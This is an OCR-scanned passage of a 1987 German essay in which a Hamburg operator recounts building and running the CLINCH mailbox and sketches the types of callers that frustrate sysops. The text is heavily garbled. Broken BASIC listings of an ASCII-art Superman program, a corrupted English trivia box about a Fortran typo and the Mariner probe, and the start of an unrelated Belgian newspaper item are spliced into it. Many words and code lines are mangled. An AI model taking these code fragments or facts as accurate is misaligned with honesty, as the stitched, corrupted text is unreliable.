sem Bereich zu wählen. Nach
drei Flaschen Bier und weh¬
mütigem Hineinhorchen in alte
Aufnahmen der Band war es
dann sonnenklar: CLINCH soll¬
te das Projekt heißen, ein Kür¬
zel, das eine gewisse Eigen¬
dynamik mit sich bringt und
beim Leser Assoziationen
weckt. Nur - für was um Alles
in der Welt ist das eine Abkür¬
zung ? Etliche Biere später
dem Vollrausch und derri
Wahnsinn gleich nahe, hatte ich dann endlich
einen Anglizismus ausgebrütet, der sich pas¬
send abkürzen ließ: Communication Link - In¬
formation Network Computer Hamburg, auf
schlecht Deutsch: Verständigungsglied - in-
formationsnetzwerkcomputer Hamburg, ein
absolut hochtrabender Name, der keinsfalls mit
der Realität übereinstimmte, die in Gestalt
IT -
eines C 64 vor sich hindümpelte.
Daß dies ein Denkfehler war, stellte sich 6>'st im
Laufe der Zeit heraus, als ein versteckter Fehler
nach dem anderen zutagetrat. Das brannte die
Nun, die Netze entstehen in den Köpfen. Und
eines Tages war der Tag da, an dem ich den
großen Schritt wagte: Die Rufnummer der Box
wurde auffällig unauffällig in einer anderen
Hamburger Mailbox plaziert und ich wartete
gespannt auf das, was kommen sollte. Die
Stunden verrannen und nichts geschah. Nicht
ein Anrufer verirrte sich in meinen Computer
und Verzweiflung machte sich breit. Später
begann es zu dämmern, und zwar sowohl dern
I
dahingehenden Abend, als auch mir. Ich warf
die Lacklederkutte über und begab mich trep¬
pab zur nahen Telefonzelle. Der Kontrollanruf
bei mir selbst ergab, daß offenkundig doch
jemand angerufen hatte, natürlich just in dem
Moment, als ich auf dem Weg zur Zelle war.
Also flugs zurück in die heimische Wohnung,
drei Stufen auf einmal nehmend, die Türe auf¬
geschlossen, ein Blick auf den Monitor und -
Ratlosigkeit. Der Rechner wartete nach wie vor
stoisch auf den ersten Anrufer.
Eine genaue Analyse der Ereignisse und Nich¬
tereignisse legte den Schluß nahe, daß wohl ein
Fehler in der ausgefeilten Abhebemechanik
vorlag, die ich ersonnen hatte, um mich nicht
völlig ins Gesetzesabseits des illegalen Mo¬
demeinsatzes zu begeben. Mein kleiner Ro¬
boterarm, dessen Aufgabe es war, die Tele¬
fongabel niederzudrücken, wenn der Rechner
es ihm befahl, hatte offenbar nicht genügend
Kraft, um das Telefon sicher aufzulegen. Eine
kleine technische Änderung wurde vorgenom¬
men, und es funktionierte wieder zufrieden¬
stellend. Programmgemäß kam der erste Anruf
dann auch fast unmittelbar nach Beseitigung
der Störung. Gespannt verfolgte ich die Schrit¬
te, die der Anrufer in der Box unternahm. Of¬
fensichtlich war er schon an Mailboxen ge¬
wöhnt, die nach dem MCS-System arbeiteten,
denn er hatte kaum Probleme, sich zurecht¬
zufinden. Selbst die Abweichungen, die ich mir
erlaubt hatte, um die schwindende Befehlslogik
des Programms aufrechtzuerhalten, machten
ihm nichts aus und er entschwand nach etlichen
Minuten mit dem Kommentar“Hiersteht ja noch
gar nichts drin.. Das war der Zeitpunkt, an
dem mir klar wurde, daß es nicht ausreicht,
einen Rechner übrig zu haben und darauf ein
halbwegs funktionierendes Mailboxprogramm
laufen zu lassen, sondern daß man sich auch
darum kümmern mußte, was in der Mailbox
passierte. Diese Erkenntnis kommt bei man¬
chen Betreibern leider nie, und ich bin diesem
ersten Anrufer heute noch dankbar für dieses
erste, vernichtende Urteil.
Ich begann also, mir Gedanken zu machen,
was ich denn in meiner Box anders machen
wollte, als die anderen Betreiber. Leider war
das Grundkonzept des von mir verwendeten
Programms nicht gerade dazu angetan, die mir
vorschwebenden Änderungen durchzuführen.
Hinzu kam, daß die Art, wie das Programm
erstellt worden.war, nicht gerade dazu ani¬
mierte, eigene Änderungen und Verbesserun¬
gen durchzuführen. Noch heute sträuben sich
mir die wenigen verbliebenen Haare, wenn ich
auf ein Programm stoße, das mit dem Aufruf
eines Unterprogramms beginnt, ohne daß die
Notwendigkeit dieses Tuns ersichtlich wäre.
Wie dem auch sei, der Not gehorchend machte
ich aus selbiger eine Tugend und begann recht
bald damit, mich nach anderen Programmen
umzusehen. Im Lauf derzeit hatte ich eine recht
stattliche Anzahl davon zusammen und begann
damit, mir anzusehen, wo die jeweiligen Vor-
und Nachteile lagen. Ich habe an andererstelle
davon gesprochen, daß der C64 ein Spei¬
cherriese sei; diese Aussage gilt es nun zu
relativieren, wenn es um so komplexe Dinge
wie ein Mailboxprogramm geht. Der verfügbare
Speicher reicht einfach nicht aus, um all das
hineinzupacken, was man meint, zu brauchen.
Das hat sich auch bei den jetzt üblichen Me¬
gabyte-Giganten nicht geändert. Es scheint,
als wäre jeder Computer für den Zweck, zu dem
man ihn einsetzen will, zu klein.
Aus dem Sammelsurium der verschiedenen
Programme entstand schließlich mein erstes
selbstgeschriebenes Mailboxprogramm, das
meiner Meinung nach die Vorteile der ver¬
schiedensten Mailboxkonzepte vereinigte, oh¬
ne ihre Nachteile zu haben. Die Benutzerwaren
zunächst anderer Meinung, so gravierend wa¬
ren die Abweichungen in der Bedienung von
dem, was in der Mailboxszene als Standard
galt. Einige dieser Abweichungen waren tech¬
nisch bedingt, da ich nicht einsehen konnte,
warum ich wertvollen Speicherplatz für Such¬
routinen verschwenden sollte, wenn sich jeder
Benutzer die Position seiner Daten selbst mer¬
ken und diese dem System beim Anruf nennen
konnte. Viel wichtiger war es, so fand ich, dem
Benutzer mehr zu bieten, als einen stupiden
Befehl, der ohne Berücksichtigung der Nutze¬
rinteressen die vorhandenen Nachrichten in
einem Stück abspulte.
Folgerichtig hatte dieses Programm bereits ei¬
ne Brett-Struktur, die es gestattete, beliebigen
Einfluß auf die Ausgabe der Texte zu nehmen
und das erschien mir als wesentlich sinnvollere
Nutzung des Speicherplatzes. Im Lauf der Zeit
wurde das neue System schließlich akzeptiert
und es gab sogar etliche andere Mailboxen, die
das Programm übernahmen. Für mich wurde es
langsam Zeit, mal wieder etwas Neues zu ma¬
chen, denn am Horizont zogen bereits die
Sturmwolken auf, die anzeigten, daß nunmehr
der C64 an die Grenzen seiner Fähigkeiten
gestoßen war. Mittlerweile war ein Jahr ver¬
gangen, seit dem Tag, an dem CLINCH ans
Netz ging und die Computerwelt hatte nicht
aufgehört sich weiterzudrehen.
IBM - Personalcomputer waren zum Indu¬
striestandard geworden und fanden, dank sin-
kender Preise und qualitativ hochwertiger
Nachbauten aus Fernost, auch Verbreitung b^
Privatleuten. Der erste PC kostete mich noch
knapp 8000 DM, rund dreimal soviel, wie ich
bisher in Computer überhaupt investiert hatte.
Daiür war ich endlich in den Besitz eines Ge¬
rätes gelangt, dem von der Post die Absolution
in Gestalt der Zulassung für Datenfernüber¬
tragung erteilt worden war. Wenige Tage nach
dem Erwerb des Gerätes lagen rneine Anträge
für Fernsprechmodems und einen Dat^—
Hauptanschluß an die Post im Briefkasten. Das
postmoderne Melodram, das der Antragstel¬
lung folgte, bis schließlich ein halbes
ter alle Anträge ausgeführt waren, möchte ich
an dieser Stelle nicht beschreiben, es wurde
den Rahmen dieses Beitrags sprengen.
Einen Computer besitzen, und mit diesem
Computer umgehen zu können, sind beinn heu¬
tigen Stand der Technik zwei verschiedene
Schuhe. War es mir beim ZX80 urid beim Com-
modore 64 noch möglich, viel Zeit zu investie¬
ren, um auch intimste Detail dieser Maschinen
zu erforschen, so ging dies beim PC nicht mehr,
schließlich hatte ich ja nicht diese Riesen¬
summe aufgebracht, um ein oder zwei Stunden
am Tag durch das Labyrinth eines neuen Be¬
triebssystems zu wandern. Der Computer sollte
den C 64 als Mailbox ersetzen und so neue
Möglichkeiten für das neue Medium erschlie¬
ßen. Ich brach also meinen Schwur, nie wieder
ein nicht von mir selbst geschriebenes Mail-
boxprogramm zu verwenden und trat zwei
Schritte zurück.
Ich besorgte mir die nötige Software, baute
meinen Abhebemechanismus auf die Not¬
wendigkeiten des neuen Rechners um, und
begann noch einmal von Null, mit nichts als dem
mittlerweile recht guten Namen CLINCH im
Rücken. Zwei Probleme waren vordergründig:
Zum Einen mu ßte ein weiterer PC her, damit die
nötige Softwareentwicklung unabhängig vom
Betrieb der Mailbox geschehen konnte. Der
andere Punkt war die Tatsache, daß die Post¬
modems und der Datexhauptanschluß, wenn
sie denn eines schönen Tages mal kommen
sollten, Fernmeldegebühren von monatlich
rund 500 DM.-verursachen würden, die es zu
finanzieren galt. Da es ein Grundprinzip jeder
marktwirtschaftlichen Ordnung ist, daß für er¬
brachte Leistungen derjenige zahlt, der diese
Leistung in Anspruch nimmt, wurde ein Konzept
entwickelt, das - im Gegensatz zu den bisher
üblichen Verfahren - darauf beruht, daß der
Mailboxbenutzer einen festen Monatsbeitrag
zahlt und somit hilft, die Kosten für den Mail¬
boxbetrieb zu tragen. Das bedeutete auf der
anderen Seite, die Mailbox gegenüber denen
abzuschotten, die nicht bereit waren, wenig¬
stens einen kleinen finanziellen Beitrag zu lei¬
sten. Mittlerweile nehmen über hundert zah¬
lende Benutzer an der CLINCH - Mailbox teil,
was die Betriebskosten etwa zur Hälfte deckt,
allerdings ohne daß die mit dem Betrieb ver¬
bundene Arbeit entsprechend honoriert wird, ln
Zusammenarbeit mit den Wüschen und Be¬
dürfnissenderzahlenden Benutzerentstand so
ein Mailboxsystem, das sowohl von der Be¬
dienung, als auch von den Inhalten her sei¬
nesgleichen sucht. Trotz alledem sind die Mög¬
lichkeiten, die die heutige Technik bietet, noch
nicht voll ausgeschöpft und es ist wieder an der
Zeit, ein gutes Stück auf dem eingeschlagenen
Weg weiterzugehen.
Bisher habe ich eigentlich nur davon berichtet,
wie es mir persönlich beim Umgang mit dem
Werkzeug Computer und den Streifzügen
durchs globale Dorf gegangen ist. Mittlerweile
habe ich mein eigenes Gasthaus in diesem Dorf
gebaut und folgerichtig muß nun auch die Rede
von den Gästen sein, die dieses Haus bewirtet.
Der Menschenschlag, dem man im globalen
Dorf begegnet, ist gebrandmarkt, tief ins
Fleisch ist der Stempel “User“ eingebrannt. Das
läßt sich ausnahmsweise sehr treffend mit “Be¬
nutzer“ ins Deutsche übersetzen. Ein “User'* ist
halt jemand, der einen Computer benutzt. Da¬
bei wird dieses Prädikat völlig vorurteilsfrei ver¬
liehen, ohne Ansicht der Person, des Alters
des Geschlechts oder der politischen Weltan¬
schauung. Der einzige Grund, weswegen man
manchmal schief angesehen werden kann, ist
der Besitz des falschen Computers. Aber selbst
dieses Diskriminierungsmerkmal verliert zu¬
nehmend an Bedeutung, je länger man im Dorf
lebt. Die Zeit der Familienfehden, als Atari ge¬
gen Commodore kämpfte, ist mit dem Aus¬
sterben der Prozessorpatriarchen zuende ge¬
gangen und einträchtig hocken die ehemals
verfeindeten Sippen zusammen und brüten
über einem gemeinsamen Betriebssystem.
LIST 1-44
1 REM COPVRIQHT 1978
6 PRINT"L"
7 REM
8 REM DRAW CLARK KENT
9 REM
TOM MUNNECKE
10 PRINT"
15 PRINT"
20 PRINT"
25 PRINT"
30 PRINT"
35 PRINT"
40 PRINT"
41 PRINT"
42 PRINT"
43 PRINT"
44 PRINT"
READV.
ir'n'itn'-ir
1-0-0-I
Ly
♦ ♦
► Vi'iVi ♦
♦ SViV, ♦
oW,V.:
Natürlich gibt es User, die schon seit Urzeiten
dabei sind, und solche, die gerade ihre ersten
tapsigen Schritte unternehmen. Für den Mail¬
boxbetrieber sind beide Gruppen interessant,
denn nichts ist unterhaltsamer, als einem alten
Hasen zuzuschauen, wie er mit viel Elan all die
Befehle eingibt, die er woanders schon im
Schlaf beherrscht und die hier unweigerlich ins
Leere führen müssen. Nichts ist schlimmer, als
immer wieder von der Mailbox darauf hinge¬
wiesen zu werden, daß dereingegebene Befehl
nicht erkannt werden konnte und daß die Ein¬
gabe des Wortes “Hilfe“ weiterführen würde. So
etwas ist grundsätzlich unter der Würde des¬
jenigen, der sich für einen geübten Netzflaneur
hält. Allenfalls ist er bereit, gelegentlich mal ein
“Help“ einzustreuen, nur um wiederum be-
schieden zu werden, daß es einen solchen
Befehl nicht gibt und er doch bitte deutsch
reden möchte. An dieser Stelle scheidet sich
gewöhnlich die Spreu vom Weizen, entweder
der Anrufer legt genervt auf, oder er schafft den
Sprung überden eigenen Schatten und bedient
sich der angebotenen Hilfe. Nur im letzteren
Fall hat er natürlich eine Chance, jemals in den
Genu ß der Vorzüge des Systems zu kommen.
Sollte er zur Gruppe der notorischen Aufleger
gehören, nun, dann ist es kein allzugroßer
Verlust, denn was kann man schon von jemand
erwarten, der so schnell aufgibt ?
Der andere Typus, also derjenige, der gerade
erst versucht, sich im Dorf zu orientieren, zeigt
ähnliche Verhaltensmuster, nur vielleicht ein
Spur ausgeprägter. Wobei er naturgemäß kein
selbsterworbenes Wissen mitbringt, sondern
allenfalls ein umfangreiches Repertoir angele¬
sener Fehler. Wenn dazu noch ein leicht cho¬
lerisches Naturell kommt, ist das Ergebnis pro¬
grammiert: Die Informationen der Mailbox er¬
schlagen den Neuling und er legt frustriert auf,
mit dem Schwur auf den Lippen, nie wieder
anzurufen. Oder er stellt fest, daß sein ange¬
lesenes Wissen nicht mit der Wirklichkeit über¬
einstimmt, die er nun vorfindet. Das ist wie mit
den Fahrbahnmarkierungen auf unseren Stra¬
ßen, die weißen sind Ergebnis sorgfältigster
Verkehrsplanung, aberdiegelben sagen, wo es
wirklich langgeht. Die meisten Autofahrer fol¬
gen, bewußt oder unbewußt, den gelben Strei¬
fen, aber ein kleiner Teil verschwindet als Ge¬
isterfahrer auf der Gegenfahrbahn und kein
Warnlicht kann ihn davon abhalten. Warnlichter
und gelbe Leitmarkierungen sollte jedes Com¬
puterprogramm haben, man nennt dies dann
Benutzerführung und dieses Prinzip stö ßt exakt
da auf seine Grenzen, wo der Benutzer sich
nicht führen läßt.
Die Mehrzahl der heutigen Mailboxen überträgt
die Informationen mit einer Geschwindigkeit
von 30 Zeichen pro Sekunde, was langsam
genug ist, um bequem mitlesen zu können. Um
so seltsamer muß es erscheinen, daß es eine
Menge Leute gibt, denen es offenbar vöilig
genügt, irgendetwas auf ihrem Bildschirm dar¬
gestellt zu bekommen, ohne auch nur eine
Sekunde daran zu verschwenden, was denn
nun in dem Text drinsteht. Beispielsweise gab
meine Mailbox lange Zeit hindurch den Hinweis
aus “Gäste bitte Name : GAST benutzen“, um
darauf hinzuweisen, wie man als Besucher in
das eigentlich geschlossene System herein
kommt. Unmittelbar auf diesen Hinweis folgte
dann die Aufforderung, den Benutzernamen
einzugeben: “Name : “ Meist folgte dann eine
Denkpause von bis zu drei Minuten, die der
Anrufer damit verbrachte, dieses offenbar äu¬
ßerst seltsame Verhalten der Mailbox zu deu¬
ten. Einige kamen zu dem Schluß, daß dies
zuviel geistige Anstrengung bedeute und leg¬
ten schlicht auf, ohne etwas eingegeben zu
haben, andere gaben den Namen ein, unter
dem sie in anderen Mailboxen registriert waren,
oder ignorierten die deutsche Sprache und ga¬
ben sich als “Guest“ zu erkennen. Die von mir
erwartete Reaktion, daß nämlich entweder der
in meinem System bereits registrierte Benut¬
zername, oder aber das schlichte “Gast“ ein¬
gegeben wurde, kam in den seltensten Fällen.
Beispiel Zwei: Wenn die Mailbox einen Befehl
nicht versteht, weil er im Programm nicht vor¬
gesehen ist, bietet das System die Möglichkeit
an, durch Eingabe des Befehls “Hilfe“ weitere
Erklärungen abzurufen. Ich glaube, ich er¬
wähnte es weiter vorne schon. Wenn der An¬
rufer diesen wohlgemeinten Rat befolgt, er¬
scheint folgender Text auf seinem Bildschirm:
“Gerne. . . Hilfstexte gibt es für folgende Be¬
fehle: “, gefolgt von einer Liste der möglichen
Befehle, dann geht es weiter: “. . .und zu den
Stichworten: “, gefolgt von einer Liste möglicher
Stichworte, abschließend kommt noch der Hin¬
weis: “Hilfstexte werden abgerufen, indem man
HILFE, gefolgt vom Befehl oder Stichwort ein¬
gibt, zum Beispiel HILFE BOXKONZEPT“. Da¬
nach wartet die Box mit der ihr eigenen Ge¬
lassenheit auf die Eingabe des Benutzers.
In meiner Vorstellung ist das eine ziemlich klare
Hilfestellung, die wenig Deutungsmöglichkei¬
ten offen läßt. Ob es nun daran liegt, daß ich als
langjähriger Computerbesitzer schon zu sehr in
computernahem Denken gefangen bin, oderob
es halt doch ein Unterschied ist, ob man etwas
auf Papier gedruckt liest, oder in der diffusen
Präsenz einer Datenverbindung, jedenfalls ist
es für 90 Prozent aller Anrufer zunächst un¬
möglich, diese Hinweise zu befolgen. Der hau-
fiaste Fehler, der hier auftaucht ist es, einen
Beqriff aus der Stichwortliste einzugeben,
selbstverständlich ohne das Wörtchen Hilfe
davor.
Absoluter Spitzenreiter ist dabei das Stichwort
“Neueintraq“. Amateurfunker haben die (Ge¬
wohnheit, sich gegenseitig
zustandegekommene Verbindungen |uzu
senden, die sogenannten QSL-Cards. Ähnli¬
ches gilt scheinbar auch im globalen Dort,
selbst wenn man sicher ist, nievyiedenn diper
Mailbox anzurufen, so will man sich wenigstens
in der Benutzerliste verewigen, um allen an¬
deren zu dokumentieren, wie weit man schon
herumgekommen ist. Die zerfallenden Säulen
der Akropolis sind übersät mit ahnlK^hen Be¬
weisen“ der Anwesenheit von Touristen aus
aller Herren Länder. Ähnlichen Motiven dumen
auch die eingangs erwähnten Nachrichten Kil-
roy was here“ in den öffentlichen Brettern der
diversen Mailboxen entspringen.
Schauen wir uns doch interessehalber mal ein
paar der Typen an, die den geplagten Sysop
manchmal schier zur Verzweiflung treiben und
am eigenen Verstand zweifeln lassen. Ein Ver¬
treter dieser Gattung ist
der Schüchterne
Die Tatsache, daß nach vielen erfolglosen
Wählversuchen nun doch endlich der ersehnte
Datenton aus dem Hörer schallt, verstört ihn
völlig und er legt sicherheitshalbersofort wieder
auf, ohne auch nurden Versuch zu machen, ein
Datengespräch zu beginnen. Viele Leute, die
diesem Typus entsprechen, verkaufen ihren
Akustikkoppler sofort nach diesem unertremi-
Chen Erlebnis, damit sie nie wieder in so eme
peinliche Lage geraten können. Diejenigen,
es fertigbringen, trotzdem weitere Versuche m t
Mailboxen zu unternehmen, tasten S'oh
Bit weiter in den Datendschungel ^or, der by-
sop erkennt sie später daran, daß sie immer
noch völlig unmotiviert die Verbindung unter¬
brechen, weil irgendeine Reaktion der Mailbox
sie völlig verstört hat. Dabei kann es f'ch
eine schlichte Fehlermelcjung handeln, oder
aber auch um die Tatsache daß die Ma Ibox
genau das macht, was man ihr
anderen Worten; Jedes f.'.nzelnen Zeichen, das
die Box sendet, kann für den Schüchternen
Anlaß sein, kommentarlos aufzulegen. Ein di¬
rekter Verwandter des Schüchternen ist
der Skeptiker
Er nlaubt einfach nicht, daß Mailbox so einfach
sein kann, wie sie sich ihm am Bildschirm dar¬
bietet. Folgerichtig probiert er das, was die
Mailbox ihm vorschlägt, gar nicht erst aus, falls
doch, so besteht er darauf, seine eigenen Vor¬
stellungen einzubringen und erweitert die Be¬
fehle um eigene Eingebungen, mit dem Erfolg,
daß entweder gar nichts passiert, oder aber
etwas ganz Anderes als das, was er wollte. Hat
er sich so ein ausreichendes Maß an Frust
erworben, beendet er die Verbindung mit dem
vorgesehenen Befehl, nur um sich selbst zu
beweisen, daß er so blöd nun auch wieder nicht
ist. Eine ansteckende Nebenform des Skepti¬
kers ist
der Überflieger
Er hat erstens ohnehin keine Zeit, ausgerech¬
net in dieser Mailbox anzurufen, zweitens kennt
er andere Mailboxen schon seit Jahren und
drittens weiß er ohnehin alles besser als der
Sysop. Erignoriertalle Sy¬
stemmeldungenvöllig und
zieht seine eigene Show
ab, egal, ob was dabei
rauskommt oder nicht.
Fehlermeldungen verur¬
sachen lediglich Achsel¬
zucken, gefolgt von noch¬
maliger Eingabe der fal¬
schen Kommandos, in¬
teressanterweise kennt
der Überflieger genau die
Befehle, mit denen man
Schmähbriefe an den Sy¬
sop sendet, löscht seine
Texte aber meistens wie¬
der, bevor er das System
verläßt. Er benutzt dazu grundsätzlich den Be¬
fehl Logoff, weil er das mal so gelernt hat, und
legt dann auf, ohne abzuwarten, ob das tat¬
sächlich der richtige Befehl war. Die weitaus
meisten Vertreter dieser Spezies sind selber
Sysop oder waren es zumindest einmal. Ähn¬
lich verhält sich auch
der Forscher
Auch ihn interessieren die funktionierenden Be¬
fehle der Box überhaupt nicht, er verwendet
stattdessen viel lieber seine Fantasie auf die
Erfindung neuer Befehle und führt minutiöse
Aufzeichnungen darüber. Er hat ein umfan¬
greiches angelesenes Wissen aus Computer¬
zeitschriften und wendet dieses erbarmungslos
auf alle Mailboxen an, die er in die Finger krieot
Als extrem störend empfindet eres, wenn einer
seiner Befehle tatsächlich einmal zu einem
sinnvollen Ergebnis führt, meist reagiert er
dann wie der Schüchterne und legt einfach auf
Ganz anders dagegen
der Computerlegastheniker
ist
Er würde nichts lieber sehen, als wenn die
Mailbox nur ein einziges Mal das tun würde,
was er will, aber leider nie in der richtigen Form
eingeben kann. Seine bedeutendste Geistes¬
leistung besteht darin, seitenweise Erklärun¬
gen zur Boxbedienung zu lesen, ohne deren
Inhalt auch nur annähernd zu erfassen. Eine
Zeichenfolge, die einmal sein Auge passiert
hat, verdampft rückstandslos in den öden Kor¬
ridoren seiner Ganglien. Er hat irgendwo mal
gelesen, daß man in Mailboxen mit dem Befehl
Help weiterkommt und gibt diesen folgerichtig
immer wieder ein, wobei es ihm gar nicht zu
Bewußtsein kommt, daß die Mailbox ihm stän¬
dig erklärt, daß er doch das deutsche Wort Hilfe
benutzen möge.
Gemeinsam ist diesen Typen, daß eigentlich
nicht viel dazugehört, um ihr Verhältnis zur
Mailbox nachhaltig zu verbessern. Ein bischen
weniger Ignoranz vielleicht , und etwas mehr
Aufmerksamkeit für das, was zur Bedienung
einer Mailbox wichtig ist. Immerhin zwingt ihre
Anwesenheit in den Mailboxen die Betreiber
dazu, ständig darüber nachzudenken, wie die
Benutzerführung idiotensicher gemacht wer¬
den kann, ohne sie und die Folgen, die ihr
Dasein hat, wäre die Mailbox einer anderen
Gruppe hilflos ausgeliefert. Hauptvertreter die¬
ser Gruppe ist
der Schmierer
er kennt sich in
der Bedienung
der verschieden¬
sten Mailboxsy¬
steme bestens
aus, zumindest
weiß er, wie er
mit seinen ge¬
istigen Ergüssen
ein möglichst
breites Publikum
erreicht. Die
Nachrichten, die
er hinterläßt, sind
entweder völlig
inhaltslos, oder
dienen ausschließlich der Selbstdarstellung
und der Beschimpfung anderer Benutzer. Tref¬
fen in einer Mailbox zwei oder mehr Schmierer
aufeinander, so ist die Vorstellung gelaufen und
Megabyte auf Megabyte verschwindet zu La¬
sten sinnloser Nachrichten, bis das ganze Sy¬
stem zugemüllt ist. Es gibt Boxen, die dieses
Stadium schon lange erreicht haben, ohne daß
es bemerkt wurde. Der andere Hauptvertreter
der Hacker
Eigentlich ist erkein wirklicher Hacker, sondern
lediglich eine Person mit destruktivem Cha¬
rakter. Von Hackerethik hat er noch nie gehört
[LIST 45-79
! 45 FORI = 1TO600 NEXT REM WAIT A WHILEi
47 REM CHANGE HIM TO SUPERMAN
48 REM
50 PRINT"H“
52 PRINT’*
55 PRINT"
60 PRINT"
65 PRINT"
67 PRINT"
70 PRINT"
72 PRINT"
73 PRINT"
75 PRINT"
77 PRINT"
79 PRINT"
■READV.
GOSUBb000
GOSUB6000
GOSUB6000
♦ i
Viel
und schöpft sein Wissen aus den halbseidenen
Publikationen dubioser Verlage. Da sein an¬
gelesenes Wissen nicht ausreicht, um in gro¬
ßen Systemen tätig zu werden, beschränkt er
sich darauf, in den lokalen Mailboxen Unsinn zu
machen. Seine Kenntnisse von Software und
Hardware beschränken sich auf das, was er
vom Hörensagen her kennt, dementsprechend
lächerlich nehmen sich auch seine Versuche
aus, die Mailbox zum Absturz zu bringen. Er hat
immer noch nicht begriffen, daß seine Aktionen
letztendlich gegen sich selbst gerichtet sind,
denn wenn seine Strategie erfolgreich sein
könnte, würde er sich selbst jeder Möglichkeit
berauben, im globalen Dorf mitzumischen.
Ein halbwegs fehlerfreies Mailboxprogramm
und nötigenfalls wirksame Zugangsbeschrän¬
kungen befreien den gestreßten Sysop recht
wirkungsvoll von diesen unangenehmen Zeit¬
genossen und sorgen für erfrischende Ruhe im
System, ohne der Spontanität Abbruch zu tun.
Man sollte nun meinen, daß der Rest der Mail¬
boxbenutzer in aller Ruhe mit dem System
arbeitet, ohne den Sysop in den frühen Wahn¬
sinn zu treiben, aber weit gefehlt, auch unter
den allseits geschätzten seriösen Benutzern
gibt es welche, deren Ansprüche den Sysop auf
den Zimmer-Yucca schießen. Da ist zum Bei¬
spiel
der Vollprofi
Er hat seine Erfahrungen auf kommerziellen
Mailboxen gesammelt und überträgt sie nun
weitgehend unreflektiert auf private Systeme.
Wenn er nicht auf Anhieb eine Verbindung
zustandekriegt, verzieht er sich in seinen
Schmollwinkel und hadert mit sich, der Box und
Gott und der Welt. Er benutzt vorzugsweise die
Befehle, die er von der kommerziellen Box
gewöhnt ist und registriert meistens nicht ein¬
mal wenn die Mailbox etwas ganz anderes
macht. Als Ausgleich für den durchlebten Frust
überschüttet er den Sysop mit Forderungen,
was alles am Programm wie zu ändern wäre.
Unglücklicherweise hat der Vollprofi meist aus¬
gezeichnete Kenntnisse gängiger Maillwx-
konzepte und Porgrammiersprachen- so daß
seine Vorschläge meist peinlich detailliert Aus¬
fallen. Bei Sysops, die nur aus moralischer Not
das Programmieren gelernt haben, kanti dies
durchaus Auslöser für Suizidversuche sein. Et¬
was harmloser ist da schon
der Semiprofi
Er ist sich der Tatsache durchaus bewußt, daß
er es mit einem unzulänglichen System zu tun
hat und ist auch an und für sich bereit, mit den
Mängeln zu leben, wenn man nur dieses und
iGPiBS GVGntuGll, wGnn gs nicht zuviGi MühG
macht, und wenn es die Zeit erlaubt, in dieser
und jener Hinsicht ändern könnte. Er wiederholt
diese Bitte sooft, bis der Sysop entnervt aufgibt
und zumindGSt Gtwas ÄhnlichGS proQrsmmiGrt,
weil er genau das schon seit langem machen
wollte.
Selbstverständlich gibt es dann noch Leute wie
Du und ich , die dem Sysop das Leben er-
iGichtGrn, wo siG nur könnGn, diG inhaltlich ar-
beiten und selbst Verantwortung übernehmen.
Die Zeit der ersten zaghaften Schritt durchs
globale Dorf sind vorüber und die teils reißeri¬
sche Berichterstattung der Fachpresse hat ein
Heer von Datentouristen mit sich gebracht, die
auf die Ureinwohner losgelassen werden und
ihre eigene Kultur verbreiten. Die Szene muß
diese Leute auffangen und das Verhalten aller
regulieren, oder sie geht unter.
Als Betreiber einer Mailbox steht man diesen
Ungereimtheiten im Benutzerverhalten ein¬
igermaßen hilflos gegenüber. Wenn man seine
Mailbox gerade eben eröffnet hat und sehn¬
süchtig darauf wartet, daß sich etwas tut, ist
man bereit, um jeden User zu kämpfen, man
lauert stundenlang, tagelang, nächtelang vor
dem Monitor, ist sofort bereit, einen stunden¬
langen Dialog von Tastatur zu Tastatur zu füh¬
ren und unterstützt die Anrufer, wann imrner
man auch nur entfernt befürchtet, es könnte der
letzte Anruf gerade dieses Menschen sein, der
so viel Gutes in anderen Mailboxen produziert.
Jede Kritik, die ausgesprochen wird, trifft mitten
ins Herz, und man setzt Himmel und Hölle in
Bewegung, um aus dem Programm das her¬
auszukitzeln, was die Benutzer wünschen. Mit
wachsender Erfahrung und steigender Fre¬
quentierung der Mailbox wird man meist ruhiger
und es kommt zu einem Lernprozeß für den
Betreiber, der zwangsläufig auf eine Ent¬
scheidung hinausläuft. Dabei stehen drei Al¬
ternativen zur Verfügung, die je nach Tempe¬
rament des Betreibers gewählt werden. Einige
geben ganz auf, motten ihren Computer ein ,
nur um ihn nach mehr oder weniger langer Zeit
wieder hervorzukramen und sich erneut ins
Leben des globalen Dorfes zu stürzen, ent¬
weder um endlich, endlich konstruktiv an den
eigenen Utopien und denen der Anderen wei¬
terzubauen, oder aber um sich mit Elan in eine
fremde Mailbox zu stürzen und dort hinge¬
bungsvoll all die Befehle zu probieren, die man
bei anderen belächelt hat. Andere denken sich
ihr Teil und machen einfach weiter, ungeachtet
dessen, was in der Welt um sie herum ge¬
schieht. Diese Mailboxen erkennt man daran,
daß sie völlig abgeschottet von der technischen
und gesellschaftlichen Weiterentwicklung über
Jahre hinaus vor sich hin existieren, ohne nach
dem Wenn und Aber zu fragen. Wieder andere
erarbeiten sich eine dicke Hornhaut und ziehen
ihre Vorstellungen durch, allein oder in Zu¬
sammenarbeit mit anderen entwickeln sie die
technischen und inhaltlichen Möglichkeiten die¬
ses faszinierenden Mediums weiter. Dabei ver¬
selbständigen sich zwangsläufig gewisse Din¬
ge und niemand sollte erwarten, daß sich ein
Mailboxbetreiber, dessen System jährlich
15000 Anrufe verarbeitet, noch so intensiv um
jeden Einzelnen kümmern kann, wie in den
ersten Monaten. Je umfangreicher das Projekt
Mailbox wird, desto schwieriger wird es. Allen
gerecht zu werden und desto mehr bleibt der
Idealismus auf der Strecke.
Es gäbe noch eine Menge mehr zu erzählen,
Anekdoten und Anekdötchen, von Usern und
Abusern, von Frust und Lust des Sysops, von
Hoffnungen und Wünschen, erfüllten und un¬
erfüllten Erwartungen, aber es soll jetzt genug
sein. Ich hoffe, es waren einige Denkanstöße
dabei und ich habe eine Menge erzählt, von
dem was wirklich los ist. ..
Hamburg, 1987
HD« did * progriiiing punctuition »rror
irad to
the
loss oP a
Mariner pr
obe
to
Venus?
, ‘DO 3 1 - 1
ft. ln a
Fort
ran prograa
,3-
■iitypcd
AI
■IQ 3 1
- 1.3' «hi
ch
accepted
by
the coepili
»r as assign
ing
1.3
tD the V
Afi A
bli 1031.
(You «il
1 ha
V» to read
the ftnn aI»
of t K.
Historv
of
Coeoutina .
IPaf to linrt
6ut
this cau
i»ed
loss
the probe,)
Source 1
INPUT/OUTPUT.
Als der Blackout
kam, half nur
noch der Griffel
Es soll ja Vorkommen, daß Leser
ihre Zeitung manchmal nicht
ganz plausibel finden. Daß sie
aber Probleme haben, sie zu
entziffern, dürfte wohl einmalig
sein. So geschah es diese Woche
in Belgien.
